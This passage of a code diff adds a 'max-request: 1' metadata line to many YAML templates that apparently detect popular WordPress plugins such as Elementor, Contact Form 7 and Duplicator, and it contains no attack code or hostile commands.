--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/breadcrumb-navxt/
 metadata:
+ max-request: 1
 plugin_namespace: breadcrumb-navxt
 wpscan: https://wpscan.com/plugin/breadcrumb-navxt
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/breeze/
 metadata:
+ max-request: 1
 plugin_namespace: breeze
 wpscan: https://wpscan.com/plugin/breeze
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/broken-link-checker/
 metadata:
+ max-request: 1
 plugin_namespace: broken-link-checker
 wpscan: https://wpscan.com/plugin/broken-link-checker
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/child-theme-configurator/
 metadata:
+ max-request: 1
 plugin_namespace: child-theme-configurator
 wpscan: https://wpscan.com/plugin/child-theme-configurator
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/classic-editor/
 metadata:
+ max-request: 1
 plugin_namespace: classic-editor
 wpscan: https://wpscan.com/plugin/classic-editor
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/classic-widgets/
 metadata:
+ max-request: 1
 plugin_namespace: classic-widgets
 wpscan: https://wpscan.com/plugin/classic-widgets
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
 metadata:
+ max-request: 1
 plugin_namespace: click-to-chat-for-whatsapp
 wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/cmb2/
 metadata:
+ max-request: 1
 plugin_namespace: cmb2
 wpscan: https://wpscan.com/plugin/cmb2
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/coblocks/
 metadata:
+ max-request: 1
 plugin_namespace: coblocks
 wpscan: https://wpscan.com/plugin/coblocks
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/code-snippets/
 metadata:
+ max-request: 1
 plugin_namespace: code-snippets
 wpscan: https://wpscan.com/plugin/code-snippets
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/coming-soon/
 metadata:
+ max-request: 1
 plugin_namespace: coming-soon
 wpscan: https://wpscan.com/plugin/coming-soon
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/complianz-gdpr/
 metadata:
+ max-request: 1
 plugin_namespace: complianz-gdpr
 wpscan: https://wpscan.com/plugin/complianz-gdpr
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/contact-form-7-honeypot/
 metadata:
+ max-request: 1
 plugin_namespace: contact-form-7-honeypot
 wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/contact-form-7/
 metadata:
+ max-request: 1
 plugin_namespace: contact-form-7
 wpscan: https://wpscan.com/plugin/contact-form-7
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/contact-form-cfdb7/
 metadata:
+ max-request: 1
 plugin_namespace: contact-form-cfdb7
 wpscan: https://wpscan.com/plugin/contact-form-cfdb7
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/cookie-law-info/
 metadata:
+ max-request: 1
 plugin_namespace: cookie-law-info
 wpscan: https://wpscan.com/plugin/cookie-law-info
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/cookie-notice/
 metadata:
+ max-request: 1
 plugin_namespace: cookie-notice
 wpscan: https://wpscan.com/plugin/cookie-notice
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/creame-whatsapp-me/
 metadata:
+ max-request: 1
 plugin_namespace: creame-whatsapp-me
 wpscan: https://wpscan.com/plugin/creame-whatsapp-me
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/creative-mail-by-constant-contact/
 metadata:
+ max-request: 1
 plugin_namespace: creative-mail-by-constant-contact
 wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/custom-css-js/
 metadata:
+ max-request: 1
 plugin_namespace: custom-css-js
 wpscan: https://wpscan.com/plugin/custom-css-js
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/custom-fonts/
 metadata:
+ max-request: 1
 plugin_namespace: custom-fonts
 wpscan: https://wpscan.com/plugin/custom-fonts
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/custom-post-type-ui/
 metadata:
+ max-request: 1
 plugin_namespace: custom-post-type-ui
 wpscan: https://wpscan.com/plugin/custom-post-type-ui
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/disable-comments/
 metadata:
+ max-request: 1
 plugin_namespace: disable-comments
 wpscan: https://wpscan.com/plugin/disable-comments
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/disable-gutenberg/
 metadata:
+ max-request: 1
 plugin_namespace: disable-gutenberg
 wpscan: https://wpscan.com/plugin/disable-gutenberg
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/duplicate-page/
 metadata:
+ max-request: 1
 plugin_namespace: duplicate-page
 wpscan: https://wpscan.com/plugin/duplicate-page
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/duplicate-post/
 metadata:
+ max-request: 1
 plugin_namespace: duplicate-post
 wpscan: https://wpscan.com/plugin/duplicate-post
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/duplicator/
 metadata:
+ max-request: 1
 plugin_namespace: duplicator
 wpscan: https://wpscan.com/plugin/duplicator
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
 metadata:
+ max-request: 1
 plugin_namespace: duracelltomi-google-tag-manager
 wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/easy-fancybox/
 metadata:
+ max-request: 1
 plugin_namespace: easy-fancybox
 wpscan: https://wpscan.com/plugin/easy-fancybox
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/easy-table-of-contents/
 metadata:
+ max-request: 1
 plugin_namespace: easy-table-of-contents
 wpscan: https://wpscan.com/plugin/easy-table-of-contents
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/easy-wp-smtp/
 metadata:
+ max-request: 1
 plugin_namespace: easy-wp-smtp
 wpscan: https://wpscan.com/plugin/easy-wp-smtp
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/elementor/
 metadata:
+ max-request: 1
 plugin_namespace: elementor
 wpscan: https://wpscan.com/plugin/elementor
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/elementskit-lite/
 metadata:
+ max-request: 1
 plugin_namespace: elementskit-lite
 wpscan: https://wpscan.com/plugin/elementskit-lite
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/enable-media-replace/
 metadata:
+ max-request: 1
 plugin_namespace: enable-media-replace
 wpscan: https://wpscan.com/plugin/enable-media-replace
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/envato-elements/
 metadata:
+ max-request: 1
 plugin_namespace: envato-elements
 wpscan: https://wpscan.com/plugin/envato-elements
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
 metadata:
+ max-request: 1
 plugin_namespace: essential-addons-for-elementor-lite
 wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ewww-image-optimizer/
 metadata:
+ max-request: 1
 plugin_namespace: ewww-image-optimizer
 wpscan: https://wpscan.com/plugin/ewww-image-optimizer
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/facebook-for-woocommerce/
 metadata:
+ max-request: 1
 plugin_namespace: facebook-for-woocommerce
 wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/fast-indexing-api/
 metadata:
+ max-request: 1
 plugin_namespace: fast-indexing-api
 wpscan: https://wpscan.com/plugin/fast-indexing-api
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
 metadata:
+ max-request: 1
 plugin_namespace: favicon-by-realfavicongenerator
 wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/flamingo/
 metadata:
+ max-request: 1
 plugin_namespace: flamingo
 wpscan: https://wpscan.com/plugin/flamingo
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/fluentform/
 metadata:
+ max-request: 1
 plugin_namespace: fluentform
 wpscan: https://wpscan.com/plugin/fluentform
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/font-awesome/
 metadata:
+ max-request: 1
 plugin_namespace: font-awesome
 wpscan: https://wpscan.com/plugin/font-awesome
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/force-regenerate-thumbnails/
 metadata:
+ max-request: 1
 plugin_namespace: force-regenerate-thumbnails
 wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/formidable/
 metadata:
+ max-request: 1
 plugin_namespace: formidable
 wpscan: https://wpscan.com/plugin/formidable
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/forminator/
 metadata:
+ max-request: 1
 plugin_namespace: forminator
 wpscan: https://wpscan.com/plugin/forminator
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ga-google-analytics/
 metadata:
+ max-request: 1
 plugin_namespace: ga-google-analytics
 wpscan: https://wpscan.com/plugin/ga-google-analytics
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/gdpr-cookie-compliance/
 metadata:
+ max-request: 1
 plugin_namespace: gdpr-cookie-compliance
 wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
 metadata:
+ max-request: 1
 plugin_namespace: google-analytics-dashboard-for-wp
 wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/google-analytics-for-wordpress/
 metadata:
+ max-request: 1
 plugin_namespace: google-analytics-for-wordpress
 wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/google-listings-and-ads/
 metadata:
+ max-request: 1
 plugin_namespace: google-listings-and-ads
 wpscan: https://wpscan.com/plugin/google-listings-and-ads
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/google-site-kit/
 metadata:
+ max-request: 1
 plugin_namespace: google-site-kit
 wpscan: https://wpscan.com/plugin/google-site-kit
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/google-sitemap-generator/
 metadata:
+ max-request: 1
 plugin_namespace: google-sitemap-generator
 wpscan: https://wpscan.com/plugin/google-sitemap-generator
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
 reference:
